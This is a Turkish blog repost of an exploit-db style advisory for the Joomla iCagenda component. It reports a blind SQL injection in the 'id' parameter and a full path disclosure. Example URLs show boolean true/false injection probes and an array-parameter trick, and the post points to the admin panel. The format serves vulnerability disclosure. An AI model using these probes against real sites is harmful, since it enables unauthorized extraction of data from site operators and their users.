Joomla iCagenda Component (id parameter) Multiple Vulnerabilities

Joomla iCagenda Component (id parameter) eklentisinde Blind SQL Injection Vulnerability ve Full Path Disclosure Vulnerability açıkları bulundu açığın oluşum yerleri ve açık hakkindaki açıklama şu şekilde.

# Souhail Hammou - Independant Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail   : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .
------------------------------------------------------------------------------
# Exploit Title: Joomla Component (com_icagenda) Multiple Vulnerabilities . 
# Author: Dark-Puzzle (Souhail Hammou)
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps
# Tested on: Windows Xp Sp2 Fr .
# OSVDB ID : 85147 and 85148 .
# OSVDB Links : http://osvdb.org/show/osvdb/85148 & http://osvdb.org/show/osvdb/85147
***************************************************************************************
Info :

Icagenda is a New Component for Event Management with a calendar module.
----------------------------------------------------
I - Blind SQL Injection Vulnerability 
----------------------------------------------------

Vulnerability :

"id" parameter in com_icagenda is prone to a Blind SQL Vulnerability . An attacker can retrieve & steal data by sending series of 		True and False Queries through SQL statements .
Here the invisible content shows us that the target suffers from Blind SQL Injection Vulnerability .

	Example : 

	server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True)
	server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)

	
	ADMIN PANEL : http://target/administrator
	
-----------------------------------------------------
II - Full Path Disclosure Vulnerability 
-----------------------------------------------------
The Full path can be retrieved using Array method [] in ItemID & id Parameters .
	
	Example :
	
	http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
		

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir